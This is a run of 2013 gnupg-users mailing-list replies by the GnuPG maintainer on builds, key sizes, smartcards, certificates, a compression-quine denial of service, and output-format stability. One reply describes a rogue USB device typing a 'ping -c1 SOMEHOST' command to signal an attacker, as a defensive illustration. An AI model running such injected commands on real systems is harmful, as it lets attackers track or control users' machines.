Re: GnuPG 2.0.22 compiling on Mac OS X fails
On Sat, 5 Oct 2013 14:58, so...@dersonic.org said: i just tried to compile the 2.0.22 version on Mac OS X 10.8.5 with XCode 5.0. This is known. See for example bug 1541. Sorry, I can't do anything about it until someone provides a tested solution. signal.c:125:41: warning: adding 'int' to a string does not append to the string [-Wstring-plus-int] write (2, 0123456789+(value/i), 1); ^~ signal.c:125:41: note: use array indexing to silence this warning Surely, it does not. Syntactic sugar is required to drink from this source - stupid warning. Salam-Shalom, Werner -- Die Gedanken sind frei. Ausnahmen regelt ein Bundesgesetz. ___ Gnupg-users mailing list Gnupg-users@gnupg.org http://lists.gnupg.org/mailman/listinfo/gnupg-users
Re: [Announce] [security fix] GnuPG 1.4.15 released
On Sun, 6 Oct 2013 23:30, joh...@vulcan.xs4all.nl said: The README in the source bzip2 file still states 1.4.14. Ah well, I should have not mentioned the exact version number there. Shalom-Salam, Werner -- Die Gedanken sind frei. Ausnahmen regelt ein Bundesgesetz. ___ Gnupg-users mailing list Gnupg-users@gnupg.org http://lists.gnupg.org/mailman/listinfo/gnupg-users
Re: New GPLv3 OpenPGP card implementation (on a java card).
On Tue, 15 Oct 2013 11:41, p...@heypete.com said: Also, are there any smartcards out there that would support DSA/ELG keys? All the cards I've seen and used support RSA only. You don't want DSA on smartcards - at least not until they are able to do deterministic DSA (rfc-6979). ECC on smartcards is available for a very long time because that used to be the only method to do pubkey crypto with reasonable performance on cards without a hardware exponentiation circuit. The ZeitControl cards have support for some NIST curves but it is not yet supported by by the OpenPGP card application. I am not sure whether it is a good idea to go with the NIST curves because ECDSA suffers from the same problem has DSA. What about trying to implement Ed25519 on a Java card? Salam-Shalom, Werner -- Die Gedanken sind frei. Ausnahmen regelt ein Bundesgesetz. ___ Gnupg-users mailing list Gnupg-users@gnupg.org http://lists.gnupg.org/mailman/listinfo/gnupg-users
Re: Smart card reader security
On Thu, 17 Oct 2013 17:55, christian.we...@gmail.com said: I bought a cyberJack go [1] to use it with my openPGP smart card for authentification. Since the firmware of that device is upgradeable and is capable of saving atleast 2 GB of data, how can I be sure it is not a This is not just a reader but an identification token with lots of embedded and upgradable software. It has already been shown that such smart cards readers are fun to play with. IIRC, there have been demonstrations turning the doctors health card terminals and PIN+chip terminals into space invaders consoles. Salam-Shalom, Werner -- Die Gedanken sind frei. Ausnahmen regelt ein Bundesgesetz. ___ Gnupg-users mailing list Gnupg-users@gnupg.org http://lists.gnupg.org/mailman/listinfo/gnupg-users
Re: Differences in --list-packets between 1.4 and 2.0
On Thu, 17 Oct 2013 21:26, r...@sixdemonbag.org said: Is there any way to make GnuPG 1.4 behave like 2.0 in this regard? Yes. See commit 0bdf121 which will be included into 1.4.16. Shalom-Salam, Werner -- Die Gedanken sind frei. Ausnahmen regelt ein Bundesgesetz. ___ Gnupg-users mailing list Gnupg-users@gnupg.org http://lists.gnupg.org/mailman/listinfo/gnupg-users
Re: Building pinentry on Windows 7
On Tue, 22 Oct 2013 14:06, nikola.radovano...@seavus.com said: I couldn't find any manual for building pinentry executables for Windows (specifically Windows 7/8). Also for Gpg4Win 2 in general. I The easiest way to do this is to follow the README of the gpg4win installer source. It is best to use a decent Debian systems. Although the configure script of the installer checks for required software, some checks are missing and you may run in to errors if you have not installed, for example the transfig package. Let us know what you had to install so we can add the checks. If you just want to build pinentry, you download the tarball and mkdir ~/w32root cd somewhere tar xjvf pinentry-0.8.3.tar.bz2 cd pinentry-0.8.3 ./autogen.sh --build-w32 make make install cp ~/w32root/bin/pinentry-*.exe /cifs/windows7-box/.../../ However, unless you only want the really ugly native pinentry you need to install lots of libraries first. Thus using the gpg4win installer framework is easier. Shalom-Salam, Werner -- Die Gedanken sind frei. Ausnahmen regelt ein Bundesgesetz. ___ Gnupg-users mailing list Gnupg-users@gnupg.org http://lists.gnupg.org/mailman/listinfo/gnupg-users
Re: Building Pinentry for Windows
On Fri, 25 Oct 2013 13:53, nikola.radovano...@seavus.com said: Right now, by building the whole gpg4win i have succeeded in what i wanted, but i will certainly try again with MXE to see what is the problem there. I am glad to hear that. I will add some more tests to the installer. Just for the records: It is strongly suggested to use the gpg4win installer framework or (if necessary) the related ./autogen.sh --build-32 method for building GnuPG and related stuff for Windows. The reasons for this this suggestion is that we can't maintain the set of required options and dependencies in all kind of frameworks. I also don't want to follow up on bugs due to the use of other build systems. The reported problems with the OSX Homebrew build systems are an example of such events. Shalom-Salam, Werner -- Die Gedanken sind frei. Ausnahmen regelt ein Bundesgesetz. ___ Gnupg-users mailing list Gnupg-users@gnupg.org http://lists.gnupg.org/mailman/listinfo/gnupg-users
Re: none
On Thu, 24 Oct 2013 20:49, nikola.radovano...@seavus.com said: 1) When trying to build whole Gpg4Win i ran into several problems. Package for gtkhtmlviewer2 couldn't be found, but i have Unfortunately this kind of problems happen from time to time. You may delete the claws-mail tar package from the packages directory to avoid all the Claws dependencies. (instead plugins) on a target url. Then stow was not installed on a system, and i have installed it with apt-get install stow. But Configure should have listed stow as missing, or am I wrong. makensis, which is missing, must be installed also. And it cannot be Under Debian the package is nsis. installed with apt-get. It requires python, scons, zlib and gcc to be installed already, so it is a more complicated process. Werner, if you Sure, that is due to NSIS? If so it would be a Debian packaging bug. Salam-Shalom, Werner -- Die Gedanken sind frei. Ausnahmen regelt ein Bundesgesetz. ___ Gnupg-users mailing list Gnupg-users@gnupg.org http://lists.gnupg.org/mailman/listinfo/gnupg-users
Re: 2048 or 4096 for new keys? aka defaults vs. Debian
On Sat, 26 Oct 2013 11:35, b...@beuc.net said: Plus, following this principle, why doesn't gnupg default to 4096 if there isn't any reason not to? I would suppose that if gnupg defaults 4k primary RSA keys increase the size of the signatures and thus make the keyrings longer and, worse, computing the web of trust takes much longer. Yeah, not on your high end desktop machine but on old laptops and my N900 phone. It also drains the battery faster. There is no benefit of overly large keys on average computers. After all the goal is not to have large key but to protect something. Now, if you want to protect something you need to think like the attacker - what will an attacker do to get the plaintext (or fake a signature)? Spend millions on breaking a few 2k keys (assuming this is at all possible within the next decade) or buy/develop/use a zero-day? Instead of discussing these numbers the time could be much better use to audit the used software (firmware, OS, libs, apps). Salam-Shalom, Werner p.s. I would even consider bugs like below more serious than protecting against break 2k RSA. commit a7a9cdcaaf3979baa18dad51e722882581349f45 Author: Werner Koch w...@gnupg.org Date: Sat Sep 7 10:06:46 2013 +0200 Fix bug in _gcry_mpi_tdiv_q_2exp. * mpi/mpi-internal.h (MPN_COPY_INCR): Make it work. -- This bug has been with us since the version 0.0.0 of GnuPG. Fortunately it only affects an optimized code path which is rarely used in practice: If the shift size matches the size of a limb (i.e.. 32 or 64); this is is_prime in primegen.c. Over there the Rabin-Miller test may fail with a probability of 2^-31 (that is if the to be tested prime - 1 has the low 32 bits cleared). In practice the probability is even much less because we first do a Fermat test on the randomly generated candidates which sorts out the majority of composite numbers. The bug in MPN_COPY_INCR was found by Sven Bjorn. -- Die Gedanken sind frei. Ausnahmen regelt ein Bundesgesetz. ___ Gnupg-users mailing list Gnupg-users@gnupg.org http://lists.gnupg.org/mailman/listinfo/gnupg-users
Re: gpgsm and expired certificates
On Sat, 26 Oct 2013 12:02, o...@mat.ucm.es said: Can gpgsm deal with this situation? Sure. That is a very common situation. Although I am myself not using gpgsm for mail encryption, I use it to maintain all kind of X.509 certificates. FWIW, gpgsm passed several conformance tests with quite good results [1] and was recently approved for secret communication (at the Germany's entry level VS/NfD). Salam-Shalom, Werner [1] Watch out for Aegypten, which included GnuPG, in https://www.bsi.bund.de/DE/Themen/weitereThemen/VerwaltungsPKIVPKI/Interoperabilitaetstest/Testberichte/testberichte_node.html -- Die Gedanken sind frei. Ausnahmen regelt ein Bundesgesetz. ___ Gnupg-users mailing list Gnupg-users@gnupg.org http://lists.gnupg.org/mailman/listinfo/gnupg-users
Re: 2048 or 4096 for new keys? aka defaults vs. Debian [doc patch]
On Sun, 27 Oct 2013 00:29, r...@sixdemonbag.org said: Hi! I'm the quasi-official FAQ maintainer. You can read the current text of the FAQ at: While we are at it. What about making it the official one, i.e. change the licenses to CC-by-ca/GPL? Given the importance of a FAQ I think we should not longer delay it - even if old links to certain questions won't any longer work. Salam-Shalom, Werner -- Die Gedanken sind frei. Ausnahmen regelt ein Bundesgesetz. ___ Gnupg-users mailing list Gnupg-users@gnupg.org http://lists.gnupg.org/mailman/listinfo/gnupg-users
Re: gpgsm and expired certificates
On Sat, 26 Oct 2013 22:03, o...@mat.ucm.es said: know by the date of the certificate which certificate to use for which message? - old for old messages Note, that there is no need for a certificate for decryption - only the private key is required. The certificate is only used to show some meta information. - the new for the new messages Expired certificates are not used and thus a now valid one will be used. Shalom-Salam, Werner -- Die Gedanken sind frei. Ausnahmen regelt ein Bundesgesetz. ___ Gnupg-users mailing list Gnupg-users@gnupg.org http://lists.gnupg.org/mailman/listinfo/gnupg-users
Re: gpgsm and expired certificates
On Sun, 27 Oct 2013 10:23, p...@heypete.com said: Correct, though it is possible (but usually recommend against) to create a new certificate using the same private keypair as before. In The business model of most CAs is to sell you a subscription by setting the expiration time very low so that they can ask after a year for another fee to create a new certificate. Here it does not make sense to create a new private key every year. GnuPG basically does the same by allowing you to prolong the expiration time. I interpreted Werner's comment to mean In order to decrypt messages encrypted to you, you only need a private key. You don't need a valid certificate to decrypt old messages that were encrypted to a now-expired certificate. Correct. Shalom-Salam, Werner -- Die Gedanken sind frei. Ausnahmen regelt ein Bundesgesetz. ___ Gnupg-users mailing list Gnupg-users@gnupg.org http://lists.gnupg.org/mailman/listinfo/gnupg-users
Re: 2048 or 4096 for new keys? aka defaults vs. Debian
On Sun, 27 Oct 2013 12:15, joh...@vulcan.xs4all.nl said: ElGamal/DSA to RSA after the RSA patent expired? Does RSA have any advantages over ElGamal/DSA? The only one I can think of is less It is in general faster and there are OpenPGP implementations which only support RSA (despite that the standard requires DSA and Elgamal). The drawback is that RSA signatures are larger than those made with DSA. IIRC, we discussed that back then and you may find something in the mailing list archives. Salam-Shalom, Werner -- Die Gedanken sind frei. Ausnahmen regelt ein Bundesgesetz. ___ Gnupg-users mailing list Gnupg-users@gnupg.org http://lists.gnupg.org/mailman/listinfo/gnupg-users
Re: 2048 or 4096 for new keys? aka defaults vs. Debian
On Sun, 27 Oct 2013 17:47, gn...@oneiroi.net said: Numbers please? Or are you talking about personal/subjective impressions? What about you running some benchmarks for us? Let's say: a 4k RSA key signed by 90 other 4k RSA keys, 8 2k RSA keys, and one 8k RSA key. For security reasons key signature chaching has been disabled (--no-sig-cache) because you obviously can't accept that in this high security theater. Run encryption+signature tests for 2 recipienst out of the set of these 100 keys. Compare that do a set of 2k keys with only one 4k key. Run these tests again on an average netbook. Shalom-Salam, Werner p.s. Once I did tests with off-the self smartcards. Signing a mail with 1k RSA key using these smartcards took more than one second - it was barely unusable for every days mail processing. Only when we moved to our own smartcards (the old AVR based 1k RSA keys) using a smartcards was actually usable (100ms). You don't want to wait 10 seconds to decrypt a thread of 10 mails just to notice that it was only CCed office chitchat. -- Die Gedanken sind frei. Ausnahmen regelt ein Bundesgesetz. ___ Gnupg-users mailing list Gnupg-users@gnupg.org http://lists.gnupg.org/mailman/listinfo/gnupg-users
Re: 2048 or 4096 for new keys? aka defaults vs. Debian
On Sun, 27 Oct 2013 21:28, gn...@oneiroi.net said: I don't think 1 second threshold is real no-go here. I would say you have quite high requirements. Also some MUAs can contribute to such Start working with encrypted mails and slow smartcards on a regular base and you would soon see what I mean. Communicating with recipients with some of them using --throw-keyids (i.e. lots of trial decryption) will immediately show up what I mean. Shalom-Salam, Werner -- Die Gedanken sind frei. Ausnahmen regelt ein Bundesgesetz. ___ Gnupg-users mailing list Gnupg-users@gnupg.org http://lists.gnupg.org/mailman/listinfo/gnupg-users
Re: Why trust gpg4win?
On Tue, 10 Sep 2013 15:18, ndk.cla...@gmail.com said: way to connect about anything to a computer. Emulated keyboard which sends ANSI control codes to take over your box without you noticing? Uh? Whithout you noticing? For sure you know more than me, but to my knowledge an USB keyboard only sends key scan-codes (not ANSI sequences, that's why you need to set the keyboard language). And if you have an And that key strokes may for example represent Alt-F2 ping -c1 SOMEHOST; exit and the attacker will know the time you inserted the USB stick. Now start doing some real thing. Pete proposed to use an USB-to-Serial interface to avoid attacks against the USB stack on the PC. Why should an AVR be used to implement a flash device? Because you wrote the USB stack and thus it is trustworthy. Implementing a backdoor in the AVR proper to detect the use of such a free software USB stack and subvert it would be much harder than to implement something into a closed source USB stack. Salam-Shalom, Werner -- Die Gedanken sind frei. Ausnahmen regelt ein Bundesgesetz. ___ Gnupg-users mailing list Gnupg-users@gnupg.org http://lists.gnupg.org/mailman/listinfo/gnupg-users
Re: Public algos list
On Tue, 29 Oct 2013 14:18, fabio.coa...@gmail.com said: The part that I don't understand is the two question marks in pubkey algos. Pubkey: RSA, ELG, DSA, ?, ? Sorry for that buglet. That extra output (?, ?) is due to a change in preparation of ECC support. It is already fixed in the repository. Shalom-Salam, Werner -- Die Gedanken sind frei. Ausnahmen regelt ein Bundesgesetz. ___ Gnupg-users mailing list Gnupg-users@gnupg.org http://lists.gnupg.org/mailman/listinfo/gnupg-users
Re: Issues while decrypting
On Tue, 29 Oct 2013 14:05, tahirind...@yahoo.com said: I am facing a strange issue while decrypting a file in GPG,. I get an error from command line,,, as gpg: [dont know]: Invalid packet (ctb=6b). I didnt find any reference to this issue in the past. Please help The input data is corrupt or not OpenPGP data. Shalom-Salam, Werner -- Die Gedanken sind frei. Ausnahmen regelt ein Bundesgesetz. ___ Gnupg-users mailing list Gnupg-users@gnupg.org http://lists.gnupg.org/mailman/listinfo/gnupg-users
Re: The symmetric ciphers
On Wed, 30 Oct 2013 20:25, p...@spth.de said: If we have plenty of randomness available, we could do this a Entropy (which should be at the core of every CRNG) is a scarce resource. Thus a one time pad is not going to work because you need true random at the same size of the message. XOR the message M with a random one-time pad P to obtain N. Encrypt P with A, and N with B. The drawback is that this doubles the lenth of the message. And that you need a way to securely convey the OTP to the recipient. The soviets had severe problems to do that during WWII and later and resorted to double use the one time pads. That was one of the origins of the UKUSA alliance aiming and succeeding at breaking there messages (project VENONA). Shalom-Salam, Werner -- Die Gedanken sind frei. Ausnahmen regelt ein Bundesgesetz. ___ Gnupg-users mailing list Gnupg-users@gnupg.org http://lists.gnupg.org/mailman/listinfo/gnupg-users
Re: The symmetric ciphers
On Wed, 30 Oct 2013 18:06, p...@spth.de said: I wouldn't assme that: RSA is something taught in typical maths and computer science curriculums at universities. Factorization is a well-known problem. Using RSA in a safe way is a not easy - it took more than 20 years until most cryptographers are convinced that there are safe way of using RSA. Check out the notes section in the HAC on attacks on RSA. Salam-Shalom, Werner -- Die Gedanken sind frei. Ausnahmen regelt ein Bundesgesetz. ___ Gnupg-users mailing list Gnupg-users@gnupg.org http://lists.gnupg.org/mailman/listinfo/gnupg-users
Re: make gpg-agent forget the PIN
On Fri, 1 Nov 2013 20:17, pe...@digitalbrains.com said: It's called 'scforget' here. Or better: pull off the card and take it with you. Shalom-Salam, Werner -- Die Gedanken sind frei. Ausnahmen regelt ein Bundesgesetz. ___ Gnupg-users mailing list Gnupg-users@gnupg.org http://lists.gnupg.org/mailman/listinfo/gnupg-users
[Announce] Details on the GnuPG 1.4.15 and 2.0.22 release
Hi! Taylor asked me to forward this background info: On Sat, 5 Oct 2013 10:56, w...@gnupg.org said: not yet been seen in the wild. Details of the attack will eventually be published by its inventor. The zlib compression language that OpenPGP uses is powerful enough to express an OpenPGP compression quine -- that is, an OpenPGP compressed data packet that decompresses to itself -- causing infinite nesting of OpenPGP packets. Source code to generate such a quine is at http://mumble.net/~campbell/misc/pgp-quine/. When fed the quine, older versions of GnuPG would blow the stack and crash. GnuPG 1.4.15 and GnuPG 2.0.22 avoid this by setting a small constant bound on the depth of packet nesting. (This is similar to Tavis Ormandy's IPcomp compression quine, reported in CVE-2011-1547, which I didn't know about at the time I made the OpenPGP compression quine. Both of us had read Russ Cox's article on zlib compression quines: http://research.swtch.com/zip.) Salam-Shalom, Werner -- Die Gedanken sind frei. Ausnahmen regelt ein Bundesgesetz. ___ Gnupg-announce mailing list gnupg-annou...@gnupg.org http://lists.gnupg.org/mailman/listinfo/gnupg-announce ___ Gnupg-users mailing list Gnupg-users@gnupg.org http://lists.gnupg.org/mailman/listinfo/gnupg-users
Re: bug-like: strange behaviour of addrevoker
On Tue, 5 Nov 2013 23:13, mailinglis...@hauke-laging.de said: revokers. But that didn't work as expected. After entering the command addrevoker I was asked to enter the user ID of the respective key. Why the user ID and not the key ID or fingerprint? Does that make any sense? You may use any way to specify a user id. It is the same code as used when you fire up gpg --key-edit USERID with the only restriction that the key must have certify capability which is always the case for a primary key. nor 0x1a571df5 works. Even worse: The email address doesn't work either (both ha...@laging.de and ha...@laging.de). If you have the two user IDs, gpg can't decide which to use. Thus you need to use the keyid or the fingerprint. Please check again and if you can't make it work, please create a test case for us. Shalom-Salam, Werner -- Die Gedanken sind frei. Ausnahmen regelt ein Bundesgesetz. ___ Gnupg-users mailing list Gnupg-users@gnupg.org http://lists.gnupg.org/mailman/listinfo/gnupg-users
Re: Smart card reader security
On Sat, 23 Nov 2013 17:19, nb.li...@xandea.de said: smart cards readers are fun to play with. IIRC, there have been demonstrations turning the doctors health card terminals and PIN+chip terminals into space invaders consoles. Do you have a source for that? I'd love to see some video or so :) Sorry, I have not the time to dig into this. A good starting point will be http://www.cl.cam.ac.uk/research/security/banking/. Salam-Shalom, Werner -- Die Gedanken sind frei. Ausnahmen regelt ein Bundesgesetz. ___ Gnupg-users mailing list Gnupg-users@gnupg.org http://lists.gnupg.org/mailman/listinfo/gnupg-users
Re: IMporting PGP public key into GPG 1.4.2 with no expiry shows as expired in GPG
On Mon, 2 Dec 2013 19:25, ctsonet...@yahoo.com said: When I import a PGP public key that has NO expiry date, into GPG 1.4.2, it s 1.4.2 is quite old (8 years) and you should definitely not use it anymore. It seems that you did not invoked gpg correctly. Please show us the actual command line you used and also the content of gpg.conf. You may redact keyids and user ids but please change only digits to '1' and letters to 'a' - do not redact and blanks etc. Salam-Shalom, Werner -- Die Gedanken sind frei. Ausnahmen regelt ein Bundesgesetz. ___ Gnupg-users mailing list Gnupg-users@gnupg.org http://lists.gnupg.org/mailman/listinfo/gnupg-users
Re: Much slower than other block cipher implementations?
On Thu, 5 Dec 2013 03:41, cai.0...@gmail.com said: As far as I know, only GnuPG 2.0.x on x86 environments supports AES-NI. Right. I addition you can't compare it with a simple block cipher as implemented by OpenSSL. OpenPGP does a lot more: It hashes the text to create a signature (which most uses do). A kind of MAC is computed to detected manipulations of the ciphertext. The data is compressed. The data is split up into parts so that you do not have an optimal alignment. GnuPG may decide to use the slow 3DES algorithm (unlikely these days) and in general it has never been optimized for highest speed. Shalom-Salam, Werner -- Die Gedanken sind frei. Ausnahmen regelt ein Bundesgesetz. ___ Gnupg-users mailing list Gnupg-users@gnupg.org http://lists.gnupg.org/mailman/listinfo/gnupg-users
Re: Any future for the Crypto Stick?
On Thu, 5 Dec 2013 21:14, ein...@pvv.org said: Gemalto SIM USB adapter seems to be sort of the same thing as the Crypto Stick. However, it is a bit more hassle to get a USB adapter and a smart card, cut the card to fit etc. That is not a problem. You can buy pre-punched standard OpenPGP cards: it takes less then 10 seconds to break the ID000 sized part out and put it into one of the USB stick reader (I am using an SCT2512). Shalom-Salam, Werner -- Die Gedanken sind frei. Ausnahmen regelt ein Bundesgesetz. ___ Gnupg-users mailing list Gnupg-users@gnupg.org http://lists.gnupg.org/mailman/listinfo/gnupg-users
Re: Promoting the usage of OpenPGP
On Thu, 5 Dec 2013 21:38, kloec...@kde.org said: S/MIME) for email as transparent to the users as possible. Ideally, the users wouldn't even have to notice that they are communicating via encrypted email. 100% agreement here. Unfortunately, I think email is a lost cause because there are so many different mail clients that will never support encryption. I think we Please name those email clients. I am not aware of any mainstream mail cleint without encryption support (yes, Notes, but that is not mainstream). The real problem are webmailers. have a much better chance to replace email with something new that has end-to-end encryption (and probably also authentication) built in than we have to fix email. There are some groups proposing this for some time now. A few of them have an obvious business case for their new system. However, mail will stay with us because everything works by mail. Mail has replaced letters, folder and files cabinets. You can't replace that with an online communication system, much as it is not possible to replace documents with phone call. Mail is not done for the communication but for documenting transactions. A business needs to retain most of its communication for 10 years and more. In Germany you are even required to archive certain private mails for 2 years (invoices by craftsmen). The online media is by design not able to fulfill such requirements. Well, some are saying “you may send an attachment” using our system. But in this case you are back to standard mail with just a different transport layer (i.e. no RFC-821). RFC-822 will stay with us and it is actual trivial to secure. Given that anonymity is very hard to impossible to achieve using the current internet infrastructure, I would also claim that SMTP will stay for the foreseeable future. STARTTLS is security wise not very different from https and has a chance to work reliable as soon as we have working mechanism to replace PKIX. Salam-Shalom, Werner -- Die Gedanken sind frei. Ausnahmen regelt ein Bundesgesetz. ___ Gnupg-users mailing list Gnupg-users@gnupg.org http://lists.gnupg.org/mailman/listinfo/gnupg-users
Re: Holiday giving (crowd-funding campaign?)
On Sat, 7 Dec 2013 07:31, pho...@panopticism.net said: Details were scarce, however. This sounds like perfect timing; perhaps either Sam or Werner can provide us with an update on the campaign? Sam is preparing the campaign and twittering on https://twitter.com/gnupg . This campaign will be about a better website and easier accessible information on GnuPG. Sam already has some sketches for the new website for example https://twitter.com/gnupg/status/408611650887905280 GnuPG has for too long been a tool like a sendmail/exim/postfix but deserves more user attention. This is what we want to change. In the course of the preparation, Sam convinced be that we need Twitter and even web site statistics. I have done the latter only the first two years of running GnuPG but stopped that for privacy reasons. Now we installed Piwik and people with JS enabled are tracked by us. Of course this is pseudo-anonymized and we won't hand out the raw data to anyone outside of g10 code. Piwik gives some interesting insights, for example most direct visits to gpg4win.org come from gnupg.org. Aside from the usual Google triggered visits, lifehacker.com and philzimmermann.com are top listed referrers for gnupg.org. gnupg.org has 2000 to 3000 visits a day, gpg4win.org 1500 to 2500. Salam-Shalom, Werner -- Die Gedanken sind frei. Ausnahmen regelt ein Bundesgesetz. ___ Gnupg-users mailing list Gnupg-users@gnupg.org http://lists.gnupg.org/mailman/listinfo/gnupg-users
Re: Any future for the Crypto Stick?
On Sat, 7 Dec 2013 11:29, ein...@pvv.org said: AFAIK, the US has no import restrictions on cryptography, and the RSA patent ran out years ago, so e.g. shop.kernelconcepts.de should be able to ship it to you. IIRC, Petra of kernelconcepts told me that there is no problem for them to ship to the US. You may also order by simple or encrypted mail (Petra's fingerprint is on their website); the shop is merely an email frontend to them. Shalom-Salam, Werner -- Die Gedanken sind frei. Ausnahmen regelt ein Bundesgesetz. ___ Gnupg-users mailing list Gnupg-users@gnupg.org http://lists.gnupg.org/mailman/listinfo/gnupg-users
Re: Promoting the usage of OpenPGP
On Mon, 9 Dec 2013 20:36, kloec...@kde.org said: Exactly. Webmailers was what I was thinking about. And probably mail clients used on mobile devices. I don't know how many of those support encryption. Well Kontact for N900 and Windows Mobile 6.5 has very good support (as long as you carry an extra spare battery with you);-) The guardianproject is working hard on providing support for Android and there are are a couple of other projects for encryption on mobiles. My fingers are to clumsy to even think about regularly sending or reading mails on a mobile phone (okay, a tablet might be more useful). possible to replace documents with phone call. Mail is not done for the communication but for documenting transactions. Where? AFAIK, in Germany, we still have to send faxes or registered letters with reply advice because email is not approved. (Well, maybe Since about two years we are even able to send invoices by email without any signature (before that a qualified signature was required, but that never took up). For about everything you can do by plain letter you may also use email. In fact, if you have published an email address for your business you are required to read the email and archive them in the same way you do it with snails. What do you mean by online media? Is de-mail such an online medium? Chat. In contrast to store and forward systems like email. No de-mail is a store and forward system. Shalom-Salam, Werner -- Die Gedanken sind frei. Ausnahmen regelt ein Bundesgesetz. ___ Gnupg-users mailing list Gnupg-users@gnupg.org http://lists.gnupg.org/mailman/listinfo/gnupg-users
Re: gpg-agent: pinentry-mode
On Wed, 11 Dec 2013 05:35, mailinglis...@hauke-laging.de said: That made me curious so I wanted to do just that but: That is the only occurrence of pinentry-mode in the man page... Should have shown up in 2.0 - this is a 2.1 feature. Salam-Shalom, Werner -- Die Gedanken sind frei. Ausnahmen regelt ein Bundesgesetz. ___ Gnupg-users mailing list Gnupg-users@gnupg.org http://lists.gnupg.org/mailman/listinfo/gnupg-users
Re: Git clone index-pack failed
On Thu, 12 Dec 2013 14:13, bernh...@intevation.de said: ... try again later. Check disc space. Check git version. Check if it works from the different machine/operating system/git repository. Actually this is a remote problem. git.gnupg.org had a storage failure and thus remounted itself read-only. It is currently been worked on. Shalom-Salam, Werner -- Die Gedanken sind frei. Ausnahmen regelt ein Bundesgesetz. ___ Gnupg-users mailing list Gnupg-users@gnupg.org http://lists.gnupg.org/mailman/listinfo/gnupg-users
Re: Git clone index-pack failed
On Thu, 12 Dec 2013 16:46, w...@gnupg.org said: Actually this is a remote problem. git.gnupg.org had a storage failure and thus remounted itself read-only. It is currently been worked on. git.gnupg.org is now back. Sorry for the problems. I realized them too late. Salam-Shalom, Werner -- Die Gedanken sind frei. Ausnahmen regelt ein Bundesgesetz. ___ Gnupg-users mailing list Gnupg-users@gnupg.org http://lists.gnupg.org/mailman/listinfo/gnupg-users
Another step towards crowdfunding
Hi, you may want to check out http://blog.gnupg.org which has more infos on the upcoming campaign. Sorry, for all that Javascript stuff. Shalom-Salam, Werner -- Die Gedanken sind frei. Ausnahmen regelt ein Bundesgesetz. ___ Gnupg-users mailing list Gnupg-users@gnupg.org http://lists.gnupg.org/mailman/listinfo/gnupg-users
Re: show-uid-validity default to yes
On Thu, 12 Dec 2013 20:37, pe...@digitalbrains.com said: I think it's a good idea. It's a vital piece of information if you actually The majority of users are using a GUI and thus the command line version does not matter at all. Although people should know better, I am pretty sure that there are many scripts out which parse the human readable output. Such a change would break them. Salam-Shalom, Werner -- Die Gedanken sind frei. Ausnahmen regelt ein Bundesgesetz. ___ Gnupg-users mailing list Gnupg-users@gnupg.org http://lists.gnupg.org/mailman/listinfo/gnupg-users
Re: Another step towards crowdfunding
On Fri, 13 Dec 2013 17:05, christophe.bro...@cnamts.fr said: * a very lean and clean GnuPG blog design :) and excellent promotional video ! I was somehow able to convice Sam not to install Wordpress like blogging software right now. Which also means that for comments you need to resort to gnupg-users ;-). One question : will STEED be in the scope of theupcoming crowdfunding campaign No. A better communication platform will help us to gain more attention. If that works out, I hope to be able to help working on STEED without having to wonder how to feed my family the next month. Salam-Shalom, Werner -- Die Gedanken sind frei. Ausnahmen regelt ein Bundesgesetz. ___ Gnupg-users mailing list Gnupg-users@gnupg.org http://lists.gnupg.org/mailman/listinfo/gnupg-users
Re: show-uid-validity default to yes
On Fri, 13 Dec 2013 17:04, pe...@digitalbrains.com said: Has it ever been researched in which way users use GnuPG? A part of the GUI users might also still use the command line for certain things. My guess is that the majority of GnuPG users are not aware that they are using GnuPG. They see Enigmail, or GpgOL, or Mac tools. I even heard rumors that most sysadmins these days are preferring web based administration tools; so if sysadmins are using GUIs why should users prefer the command line. I estimate that not more than 1% of all GnuPG users are using gpg in the shell. Right, the audience of this list is for the geeks - they know how to use mailing lists. Most users don't. Yes, but if you first say Avoid using the output of this command in scripts or other programs as it is likely to change as GnuPG changes and then still not make changes to the output because unthoughtful I know. But part of the relative stability of the GPG interface is that even we deprecate stuff we keep supporting them for a long long time. I have suggested hundreds of times to better change a certain script to use --with-colons but I doubt that many followed that suggestion. After all it worked for them and why should the spend time changing a running system. It is indeed debatable whether this particular improvement is worth it. Better add a hint to the FAQ. Shalom-Salam, Werner -- Die Gedanken sind frei. Ausnahmen regelt ein Bundesgesetz. ___ Gnupg-users mailing list Gnupg-users@gnupg.org http://lists.gnupg.org/mailman/listinfo/gnupg-users
Re: show-uid-validity default to yes
On Fri, 13 Dec 2013 21:05, mailinglis...@hauke-laging.de said: Maybe. But it is trivial to check whether gpg runs as part of a script, isn't it? It already does so today. I have forgotten where it is done but some Huh? It is impossible without using a lot of heuristics and knowledge of the environment. You mean the istty thing? Think about expect(1). future versions of 1.4 or 2.0 but for 2.1 only. There have been output format changes from 1.4.x to 2.0.x, too. Not that I can remember right now (unless you mean --fixed-list-mode). Salam-Shalom, Werner -- Die Gedanken sind frei. Ausnahmen regelt ein Bundesgesetz. ___ Gnupg-users mailing list Gnupg-users@gnupg.org http://lists.gnupg.org/mailman/listinfo/gnupg-users
Re: show-uid-validity default to yes
On Fri, 13 Dec 2013 21:24, d...@fifthhorseman.net said: this sounds like an argument for being willing to change the human-readable output on the shell -- there are not many people looking at it anyway, and most of those people are sophisticated user. It is a Unix tool and people want to have it as a Unix tools. The separation between a machine readable and the human interface is not a standard Unix tool property. Thus admins don't know about it. I think for a piece of critical security infrastructure, GPG has been supporting some insecure practices for far too long. Why do you think this is insecure? Because gpg does not encrypt to a key and users work around this by using --always-trust? If you're referring to a specific script, please point me to it and its authors; i'll badger them as well; that's not a fun job, and there is no reason you should do it solo. I can't point you to such scripts. Most software is not in public use but used in-house. Sometimes I receive bug reports or requests for help and then I notice these problems. Not much we can do about. In fact, too many sites are using outdated versions because they fear things may break. Such breaks have been very rare with gpg and that is a good thing. presumably relates to people who *do* use gpg from the command line (they're actually scripting it!), and should know better. The way to They implemented something and then it is never touched again. get people to learn about it is to go ahead and improve the UI. I am willing to consider a change for 2.1 - that will anyway break things (no more secring.gpg). Shalom-Salam, Werner -- Die Gedanken sind frei. Ausnahmen regelt ein Bundesgesetz. ___ Gnupg-users mailing list Gnupg-users@gnupg.org http://lists.gnupg.org/mailman/listinfo/gnupg-users
Re: Sharing/Storing a private key
